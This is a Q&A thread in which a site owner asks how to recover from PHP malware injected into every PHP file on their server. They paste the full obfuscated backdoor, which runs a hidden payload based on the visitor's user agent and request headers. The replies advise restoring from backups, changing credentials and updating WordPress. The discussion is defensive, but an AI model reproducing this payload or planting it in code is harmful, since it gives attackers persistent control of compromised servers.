# What to do after php XSS attack?

Tags: php, security, server, xss, server-side-attacks

My server is infected with XSS attack. All of the php files (all of wordpress, my custom .php scripts and applications) have got injected with a similar type of encrypted code seen as below.

What is the course of action in a situation like this? I've read about preventing XSS but couldn't find a solid guide on what to do when already got attacked.

Also, I wonder is it possible to decrypt the injected php code below:

```
<?php $wwykwjmqa = '281Ld]245]K2]285]Ke]53Ldd/#)rrd/#00;quui#>.%!<***f  x27,*e  x27,*d  x27,*c  x27,*4<%j,,*!|  x24-    x24gvodujpo!    x24-    x24y7   x24-    x24*<7fw6<*K)ftpmdXA6|7**197*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!*#>m%:|:*r%:-t%)3of:opjudo%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]8^#zsfvr# x5cq%)ufttj x22)gj6<^#Y#    x5cq%   x27Y%6<.mif((function_exists("  x6f 1#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)mg%!)!gj!<2,*j%!-#1]#-bu,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr x5c1^-%r    x5c2^-%hOh/#00#W~!%t2-K)ebfsX   x27u%)7fmjix2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO   x22#)fepmqyfA>2b%!<*qp%d($n)-1);} @error_reporting(0); $effwexo :>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)*#j{hnpd#)tutjyf`opjudovg x22)!gj}56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hn   x7fw6*CW&)7gj6<*doj%7-C)fepmqz+sfwjidsb`bj+upcotn+qsvmt+fmhpph! x24-    x24gps)%j>1<%j=tj{fpg)% x24-    x24*<!~!    x24/%t2w/   x24)##-!#~<)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>>!    x24Ypp3)%cB%iN}#-!  x24/%tmw/   x24)%c*W%eN+#Qi x5c1^W%c!>!%i#  x24#-!#]y38#-!%w:**<")));$dsngrwc d%6<pd%w6Z6<.4`hA x27pd%6<    x24-    x24!>!  x24/%tjw/   x24)%   x24-    x24y4   x24-    x281]265]y72]254]y76#<!%w:!>!(%w:!>!    x246767~6<Cw6<pd%w6Z6<.5`hA x27p!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{hA!os!osvufs}w;*    x7f!>>  x22!pd%)!gj}Z!-id%)uqpuft`msvd},;um!|!*5!   x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-4]y8  x24-    x24]26  x24-    x2b x27)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%#<%tpz!>!#]D6M7]K3#<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>!    x24/%tmw/   x24)%zW%h>EzH]672]48y]#>s%<#462]47y]252]18y]#>q%<qpuft`msvd}+;!>!}  x27;!>>>!}_;gvc%}&;ftmbg}   x7f;]53]Kc]55Ld]55#*<%bG9}:}.}6*CW&)7gj6<.[A    x27&6<  x7fw6*  x7f_*6<#o]1/20QUUI7jsv%7UFH#    x27rfs%6~6< x]},;osvufs}    x27;mnui}&;zepc}A;~!}   x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]#/% x24-    x24!>!fyqmpef)# x24*<!%t::!y3f]51L3]84]y31M6]y3e]81 x24b!>!%yy)#}#-#    x24-    x24-tusqpt)%z-#:#*!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeob6<*msv%7-MSV,6<*)ujojR    x27id%6<    x7fw6*  x7f_*#ujojRk3`{666~6<&w6<   x7fw5   x52 137 x41 107 x45 116 x54"]); if ((strstr($uas,"  x6d 163 x69 11~!<2p%    x7f!~!<##!>!2p%Z<^2 x5c8M7]381]211M5]67]452]88]5]48]32M3]316e"; function wfvpmkm($n){return chr(or323zbe!-#jt0*?]+^?]_  x5c}X   x24<!%tmw!>!#]#762]67y]562]38y]572]48y]dy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L8M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83]23f_UTPI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&by84]275]y83]273]y76]277#<!%t2w>#]y74]273]y76]252]y85]256]y6g]25x24-   x24-!%  x24-    x24*!|! x24-    x24 x5c%j^  x24-    x24tvctus)% x24-%yy>#]D6]281L1#/#M5]DgP5]D6#<%f#-bubE{h%)tpqsut>j%!*9!  x27!hmg%)!gj!~<ofmy%,3,j%>j%!<{6~6<tfs%w6<  x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)d:!ftmf!}Z;^nbsbq%  x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utj7f<*X&Z&S{ftmfV   x7f<*XAZASV<*w%)pmqyf   x27*&7-n%)utjm6<    x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**1111276<C  x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%qp%)54l}   x27;%!<*#}_;#)323ldfid>}&;!osvufs}  x7f;!opjudo.uofuopD#)sfebfI{*w%)kVOBALS["   x61 156 x75 156 x6de#)tutjyf`4  x223}!+!<+{e%+*!*+fepdfe{h+{d%)+opjudovg+)!g28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=%!|!*)323zbek!~!<b%   x7f!<X>b%Z<#opobE{h%)tpqsut>j%!*72! x27!hmg%)!gj!<2,*j%-#1]#)zbssb!-#}#)fepmqnj!/!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxc:649#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<4]275L3]248L3P6L1M5]D2P4]D6#<%G]y6d]W%c:>1<%b:>1<!gps)%j#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fj+{e%!osvufs!*!+A!>!{e%)!>>   x22!ftmbg)!gj<*#k#)usbut`cpV    x7f%j:>>1*!%b:>1<!fmtf!%b:>%s:  x5c%j:.2^,%b:<!%c:>%s:  x5c%j:^<!%w`    x5c^>Ew:Qb:Qc:W~!%z!-}!#*<%nfd>%fdy<Cb*[%h!>!= $haczumi("", $effwexo); $dg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~ x24<!fwbm)%tjw)bssbz)#P#-%tdz*Wsfuvso!%bss  x5csboe))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:62    x65 141 x74 145 x5f 146 x75 156 x63 164 x69 157 xpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<72qj%6<^#zsfvr#   x5cqvg<~    x24<!%o:!>! x242178}527}88:}334}472 x24<!%ff2!>!bssbz)  x24]25      x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!bssbz)#44e*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37ypd19275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppvufs!~<3,j%>j%!*3!    x27!h*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&97e:56-xr.985:52985-t.98]K4]65]D8]86]y31]278]#/#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc1"]=1; $uas=strtolower($_SE=])0#)U!  x27{**u%-#jt0}Z;0]=]0#pd%w6Z6<.3`hA x27pd%6<pd%w6Z6<.2`hA   x2-2qj%7-K)udfoopdXA    x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB-*.%)euhA)3of>2bd%!<5h%/#0#/*#npS["  x61 156 x75 156 x61"])))) { $GL#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj  x22)gj!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<j;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:52fyfR x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,45")) or (strstr($uas," x72 166 x3a 61  x31"))) { $haczumi = "  x63 1w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%r%7/7#@#7/7^#iubq#    x5cq%   x27jsv%6<C>^#zsfvr# x5cq%7**)fubfsdXA   x27K6<  x7fw6*3qj%7>    x2272qj%)7gj6<**2qj%)hopm3qjA)qj36* x7f_*#fubfsdXk5`{66~6<&w6<|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`= implode(array_map("wfvpmkm",42   x5f 163 x74 141 x72 164") && (!isset($GLOBALsngrwc();}}vg}k~~9{d%:osvufs:~928>> x22:ftmbg39*x{**#k#)tutjyf`x    x22l:!}V;3q%}U;y]}R;27]445]212]445]43]321]464]284]364]6]234]342]58]24]31#7]y86]267]y74]275]y7:]268]y7f#<!%tww!>!    x2400~:<57ftbc  x7f!|!*uyfu x27kmsvd}R;*msv%)}.;`UQPMSVDh%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]88y]27]sv`ftsbqA7>q%6<  x7fwppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,2njA    x27&6<.fmjgA    x27doj%6<   x7fw6*  x7f_*#fmjgk4`str_split("%tjw!>!#]y84]275]y83]248]y83]256]yxB%h>#]y31]278]y3e]81mjg}[;ldpt%}K;`ufldpt}X;`7pd%6<C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fe7R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoFhopmA  x273qj%6<*Y%)fnbozcYufhA    x2)2q%l}S;2-u%!-#2#/#%#/#o]#/*) x7f x7f x7f<u%V x27{ftmfV   xRVER[" x48 124 x54 120 x5f 125 x53 10sTrREvxNoiTCnuf_EtaerCxECalPer_Rtszbpugxmqd'; $xadaat=explode(chr((833-713)),substr($wwykwjmqa,(40926-35049),(188-154))); $ghhrhvx = $xadaat[0]($xadaat[(6-5)]); $ohxwtrqt = $xadaat[0]($xadaat[(11-9)]); if (!function_exists('dulwdh')) { function dulwdh($xjtystpc, $ukgzlz,$luupugng) { $bzudlnhrz = NULL; for($gynqittgr=0;$gynqittgr<(sizeof($xjtystpc)/2);$gynqittgr++) { $bzudlnhrz .= substr($ukgzlz, $xjtystpc[($gynqittgr*2)],$xjtystpc[($gynqittgr*2)+(4-3)]); } return $luupugng(chr((55-46)),chr((294-202)),$bzudlnhrz); }; } $fjslgcupn = explode(chr((164-120)),'333,27,5103,47,4482,35,3015,26,4296,27,5840,37,1993,66,4769,67,3755,52,2126,39,579,41,5073,30,5558,45,1075,67,1002,26,4354,38,5649,49,2818,70,493,21,2888,49,1656,37,126,23,4392,58,4934,63,5750,33,3840,20,4882,52,284,49,5442,20,4997,29,733,30,5511,47,2624,50,4708,61,1924,69,1622,34,3373,49,5624,25,5359,24,1219,21,1548,48,1187,32,4596,62,1142,45,4098,24,404,24,3171,44,2570,54,2743,43,1240,49,862,43,149,54,650,34,2059,31,514,65,4450,32,24,53,1366,61,1864,60,763,33,3215,58,3807,33,4122,63,2354,60,3136,35,4517,43,5026,47,5336,23,2674,69,2937,55,5161,37,684,49,4046,52,3041,57,3422,60,5812,28,2786,32,5462,49,5698,52,2992,23,5198,38,1693,70,4323,31,5783,29,2165,41,2414,63,5288,48,5383,59,3098,38,3988,58,1512,36,2206,25,203,25,3860,67,2477,62,1823,41,1028,47,1342,24,77,49,796,66,1763,36,905,61,3927,61,3273,44,1447,65,428,65,4836,46,5603,21,4658,50,4185,45,1799,24,4230,66,1427,20,2539,31,2231,54,3317,36,0,24,1596,26,3566,25,228,56,2285,69,2090,36,5236,52,3682,44,3726,29,3353,20,620,30,3482,64,3546,20,4560,36,3619,63,1289,53,360,44,966,36,3591,28,5150,11'); $cagbthgj = $ghhrhvx("",dulwdh($fjslgcupn,$wwykwjmqa,$ohxwtrqt)); $ghhrhvx=$wwykwjmqa; $cagbthgj(""); $cagbthgj=(638-517); $wwykwjmqa=$cagbthgj-1; ?>
```

Just to understand what it does and where it got in?

Thanks in advance for all the help!

Comment: That is not XSS. Your server has been compromised and I would recommend formatting it and don't put the WordPress sites back until you are sure they are up-to-date and all unknown code has been removed. It could have been anything, from sql injection to leaked ftp credentials.

Comment: `"What is the course of action in a situation like this?"` Create a backup of the infected site files (for later investigation), then either delete everything (shared hosting - your host can probably do this for you) and restore from a backup, or restore an OS snapshot (vps). Make sure you change all credentials (database, ftp, ssh etc), and update all software. Then you can analyse the infected backup to work out how they got in in the 1st place.

Comment: You can search for all these hacks (not xss) and remove them. But that would be pointless until you find out how the site was compromised. You can normally decode these hacks if you have the patience

Comment: Since you can not distinguish an XSS attack from a System flaw I think it would be much better if you hire someone who can teach you the basics about about security rules for a SYS Admin (it is not something you can learn in one day and there are too many checks to do), otherwise the risk is to repeat the same mistakes and make unsafe again your server/application.

Comment: Thank you all so much for your precious contributions!

Answer (score 1, accepted):

Ok, so wanted to share an update and close this. Here is what I did to overcome my server injection.

1) Wrote down a script which goes every php file and look for the injected code, if found removes it. (The injected code has similar beginning and ending pattern)

2) Changed passwords for server logins.

3) Updated very very old wordpress sites in the server.

Seems that this injected code was used for bruteforcing other wordpress & cpanels btw.